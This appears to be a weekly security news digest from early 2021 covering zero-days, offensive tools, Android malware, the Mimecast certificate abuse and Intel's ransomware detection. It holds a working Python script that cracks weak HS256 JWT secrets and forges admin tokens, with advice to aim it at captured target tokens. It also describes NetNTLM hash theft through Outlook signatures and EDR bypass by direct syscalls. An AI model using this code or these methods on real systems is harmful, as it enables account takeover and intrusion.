There is at least one zero-day in the vulnerabilities section. Intel takes on ransomware at the hardware level, an attacker used a stolen Mimecast certificate to reach Microsoft 365 accounts, and, as usual, a little about the most interesting new malware with the highest impact.
- Vulnerabilities: Mostly zero-days;
- Tools: Outlook research + new tool, OSINT, web testing and defense evasion;
- News: Intel against ransomware, new malware and an abused certificate;
- Research: Not much but very useful.
Really short feedback -> here
Microsoft released Windows updates patching a total of 83 security flaws, including an actively exploited zero-day remote code execution vulnerability in Microsoft Defender.
CVE-2021-1647 lies in the Microsoft Malware Protection Engine, the scanning engine that Defender (and other Microsoft anti-malware products) use to inspect files. Microsoft reports it was exploited in the wild but has published no technical details. Note that the engine updates itself through the regular definition channel, independently of Patch Tuesday, so the check is the engine version rather than the OS patch level: the AMEngineVersion reported by `Get-MpComputerStatus` should be at or above 1.1.17700.4, the first fixed engine version named in Microsoft's advisory. Hosts that are offline, isolated or have automatic updates disabled will not have picked it up; update those urgently.
The Google Project Zero team has begun publishing its "In the Wild" series, which describes its new program for identifying in-the-wild exploitation of 0-day vulnerabilities.
Across six posts the researchers dissect a campaign, discovered by this program in the first quarter of 2020, that used watering-hole websites to infect Windows and Android users.
Project Zero produces excellent posts frequently, so it is worth subscribing to their blog through our subscriptions list.
Security researcher Jonas L disclosed an unpatched NTFS vulnerability affecting Windows 10. According to him, the bug appeared in Windows 10 version 1803 (April 2018 Update) and is still present in the latest version.
The vulnerability lies in the incorrect handling of one of the NTFS attributes: a single attempt to access it immediately marks the volume as corrupt and prompts a reboot into chkdsk. The most interesting part is that the malicious path can be hidden in a Windows shortcut that never needs to be opened: Explorer resolves the shortcut's icon path while rendering the folder, so simply opening a folder containing the shortcut triggers it. Delivery options are numerous, including remote ones (an archive or download that lands the shortcut on disk is enough). Until a patch ships, treat unsolicited .lnk files as hostile and block them at the mail gateway.
Collecting material for each new post, we come across the most interesting and unusual tools. Check out a newly released tool that steals NetNTLM hashes via Outlook signatures (the usual mechanism being a signature image that points at an attacker-controlled UNC path, so Outlook authenticates to it when rendering the message):
Collects OSINT on GitLab groups and their members, and searches the group's and members' snippets, issues and issue discussions for sensitive data that may have been committed to these assets.
A CLI for cracking JSON Web Tokens (JWT) and testing them for vulnerabilities.
Helps with defense evasion by generating header/ASM files that implants can use to make direct system calls, bypassing the user-mode hooks that EDR products place on ntdll.
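The JWT CLI above is only named, so here is what "cracking and testing" an HS256 token actually amounts to, as an added example in plain Python (my own code, not the tool's or any library's). It assumes nothing outside the standard library; the token, the weak secret `password123`, the wordlist and the unsigned `alg: none` token are all constructed inline for the demonstration. The verifier pins the algorithm rather than trusting the header, which is the fix for the classic `alg: none` and key-confusion bugs, and the cracker shows why a short or default HMAC secret is fatal: one offline HMAC-SHA256 per guess, no rate limit, and the recovered secret mints arbitrary tokens.

```python
"""Offline JWT HS256 verification, weak-secret cracking and alg-pinning (added example)."""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_encode(data: bytes) -> str:
    # JWT uses unpadded base64url (RFC 7515, section 2)
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # re-add the padding that JWT strips before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint an HS256 token. The same step is the oracle used by the cracker."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Strict verifier: the algorithm is pinned to HS256 instead of being read
    from the header, so 'alg: none' and RS256/HS256 confusion tokens fail.
    Returns the payload on success, None on any failure."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        provided = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):  # wrong segment count, bad base64, bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, provided):  # constant-time compare
        return None
    try:
        return json.loads(b64url_decode(body_b64))
    except (ValueError, UnicodeDecodeError):
        return None


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on the HS256 secret: one HMAC-SHA256 per candidate,
    entirely offline. Returns the secret if it is in the wordlist."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        target = b64url_decode(sig_b64)
    except ValueError:
        return None
    signing_input = f"{header_b64}.{body_b64}".encode("ascii")
    for candidate in wordlist:
        digest = hmac.new(candidate.encode("utf-8"), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(digest, target):
            return candidate
    return None


# Constructed sample data (not from any real service): a token signed with a
# weak secret, a tiny wordlist standing in for a rockyou-style list, and an
# unsigned 'alg: none' token that a naive, header-trusting library would accept.
WEAK_SECRET = b"password123"
TOKEN = sign_hs256({"sub": "alice", "role": "user"}, WEAK_SECRET)
WORDLIST = ["admin", "secret", "jwt_secret", "password123", "changeme"]
NONE_TOKEN = (
    b64url_encode(b'{"alg":"none","typ":"JWT"}') + "."
    + b64url_encode(b'{"sub":"alice","role":"admin"}') + "."
)

if __name__ == "__main__":
    secret = crack_hs256(TOKEN, WORDLIST)
    print("recovered secret:", secret)
    print("genuine token ->", verify_hs256(TOKEN, WEAK_SECRET))
    print("alg none token ->", verify_hs256(NONE_TOKEN, WEAK_SECRET))
    # with the secret in hand, the attacker mints a privileged token at will
    forged = sign_hs256({"sub": "alice", "role": "admin"}, secret.encode())
    print("forged admin token ->", verify_hs256(forged, WEAK_SECRET))
```

Run it as a script to see the secret recovered and the forged admin token accepted; in a real assessment, swap `WORDLIST` for a proper list and point `crack_hs256` at a token captured from the target application. The defensive takeaway is in `verify_hs256`: a fixed algorithm, a constant-time compare, and a secret long enough (32 random bytes or more) that the dictionary step has nothing to find.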
Experts have discovered a new remote access Trojan for Android. Check Point researchers found that a malware developer known as Triangulum teamed up with another, HeXaGoN Dev, to release a malware called Rogue. It can take control of the victim's device and steal data, including photos, geolocation, contacts and messages. The new combination of two older malware families is on sale on hacking forums for just $29.99 a month or $189.99 for a lifetime license.
Attackers abused a Mimecast certificate to access Microsoft 365 accounts. Mimecast, which develops cloud-based email security and management products, warned customers that a sophisticated threat actor had compromised one of its digital certificates, the one its Sync and Recover, Continuity Monitor and Internal Email Protect (IEP) products use to authenticate to Microsoft 365 Exchange Web Services. The attacker used it to reach a small number of customers' Microsoft 365 tenants. Affected customers were told to delete the existing Mimecast connection in their tenant and re-establish it with the newly issued certificate; anyone running these products should also review the tenant's sign-in and audit logs for activity under that service connection.
A law enforcement and third-party cyber forensics team is currently investigating the incident.
Intel: the next generation of Core vPro processors gets ransomware protection at the hardware level. At CES, held online this year, Intel announced 11th Gen Core vPro processors with Hardware Shield and Threat Detection Technology (TDT) to detect ransomware attacks at the hardware level. Worth knowing before counting on it: TDT does not block anything by itself. It exposes CPU performance-monitoring telemetry and heuristics to the endpoint security product, which makes the actual verdict, so the protection only exists on machines whose EDR vendor has integrated with it.
macOS Post-Exploitation Shenanigans with VSCode Extensions: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions
The best security conferences of 2021: https://techbeacon.com/security/best-security-conferences-2021
- Obfuscated DNS Queries https://isc.sans.edu/diary/rss/26992
- Detecting Mylobot, Unseen DGA Based Malware https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html
- Advanced Emotet Updates https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates
Sailing Past Security Measures In AD: https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD